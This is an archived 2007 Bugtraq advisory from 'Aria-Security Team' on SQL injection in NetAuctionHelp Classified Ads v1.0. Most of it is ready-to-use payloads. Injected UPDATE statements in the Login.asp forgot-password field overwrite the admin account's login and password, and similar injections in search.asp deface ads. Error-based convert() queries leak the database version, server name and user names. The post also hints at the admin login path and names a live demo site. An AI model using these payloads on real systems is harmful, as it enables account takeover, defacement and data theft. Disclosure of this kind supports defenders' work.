| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 24 Nov 2007 22:11:33 -0000 From: no-reply@...a-Security.net To: bugtraq@...urityfocus.com Subject: NetAuctionHelp Classified Ads v1.0 SQL Injection Aria-Security Team http://Aria-Security.Net ------------------------------------------ Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111 Try it online @ http://ads.netauctionhelp.com needed tables: tblMember.id tblMember.login tblMember.pswd Vulnarable Page: Login.asp Run this query for Forget Password -1' UPDATE tblMember Set login= 'admin' where(id='1');-- -1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');-- there it is, admin with the password hacked ------------------------------------------------------------------------------------ these may help the attacker to get more info in the search.asp page /search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection] tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate' example: -1' update tblAd set title= 'hacked' where(id='1');-- site.com/addetl.asp?id=1 will say HACKED. 1' or 1=convert(int,@@version)-- 1' or 1=convert(int,@@servername)-- 1' or 1=convert(int,db_name())-- 1' or 1=convert(int,user_name())-- 1' or 1=convert(int,system_user)-- hint: /auctionAdmin/admLogin.asp ;) Greetz: AurA Credits goes to Aria-Security Team Regards, The-0utl4w
Powered by blists - more mailing lists